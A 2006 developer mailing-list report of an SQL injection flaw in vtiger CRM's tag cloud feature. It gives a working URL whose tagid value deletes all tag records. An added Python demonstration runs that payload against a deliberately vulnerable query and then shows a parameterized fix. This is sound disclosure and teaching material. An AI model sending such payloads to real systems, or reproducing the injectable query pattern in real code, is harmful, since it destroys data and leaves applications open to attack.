[Vtigercrm-developers] SQL injection attack on tag cloud feature

Tim Smith smith.timsmith at gmail.com
Fri Aug 18 21:03:14 PDT 2006


I noticed that the TagCloud php file did no checking on the tagid request
variable.

You can delete all records in the tag tables by using this URL:
vtigercrm/index.php?file=TagCloud&module=Leads&action=LeadsAjax&ajxaction=DELETETAG&tagid=0%20or%20(1=1);

Tim
onwealdtim
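The defect described above, as an added example that is not part of the original post or of vtiger's own code: a request parameter spliced straight into a DELETE statement, beside a version that validates the id and binds it as a query parameter. The table name `freetags`, the column names, the sample rows and the use of an in-memory sqlite3 database are all assumptions made for the demonstration; vtiger itself runs against MySQL through its own database layer. The payload is the one from the reported URL, decoded from `0%20or%20(1=1)`.

```python
import sqlite3

# Constructed sample data. The table and column names are assumptions for
# this example, not vtiger's real schema.
SAMPLE_TAGS = [(1, "hot"), (2, "cold"), (3, "callback")]


def make_db():
    """Build a fresh in-memory database holding the sample tags."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE freetags (tagid INTEGER PRIMARY KEY, tag TEXT)")
    conn.executemany("INSERT INTO freetags VALUES (?, ?)", SAMPLE_TAGS)
    conn.commit()
    return conn


def delete_tag_vulnerable(conn, tagid):
    """The pattern the report describes: tagid is used without any check.

    Because the value is interpolated into the SQL text, a request value such
    as "0 or (1=1)" turns the WHERE clause into one that matches every row.
    Returns the number of rows deleted.
    """
    sql = f"DELETE FROM freetags WHERE tagid={tagid}"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def delete_tag_safe(conn, tagid):
    """Hardened form: reject non-integers, then bind the value as a parameter.

    Either measure alone would block this payload; together they make sure
    the request value can never become part of the SQL syntax.
    Returns the number of rows deleted.
    """
    try:
        tagid_int = int(tagid)
    except (TypeError, ValueError):
        raise ValueError("tagid must be an integer")
    cur = conn.execute("DELETE FROM freetags WHERE tagid=?", (tagid_int,))
    conn.commit()
    return cur.rowcount


def remaining(conn):
    """Rows left in the tag table."""
    return conn.execute("SELECT COUNT(*) FROM freetags").fetchone()[0]


def demo():
    """Run the reported payload against both versions and collect the results."""
    payload = "0 or (1=1)"  # URL-decoded tagid value from the report
    results = {}

    # Unchecked version: the injected OR wipes the whole table.
    conn = make_db()
    results["vulnerable_deleted"] = delete_tag_vulnerable(conn, payload)
    results["vulnerable_remaining"] = remaining(conn)

    # Hardened version: the payload is rejected and nothing is touched,
    # while a legitimate integer id still deletes exactly one row.
    conn = make_db()
    try:
        delete_tag_safe(conn, payload)
        results["safe_rejected"] = False
    except ValueError:
        results["safe_rejected"] = True
    results["safe_remaining"] = remaining(conn)
    results["safe_legit_deleted"] = delete_tag_safe(conn, "2")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Parameter binding fixes the injection, but it does not by itself decide who may delete which tag; a handler like this one should also check that the calling user is allowed to remove the tag it is asked to remove.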

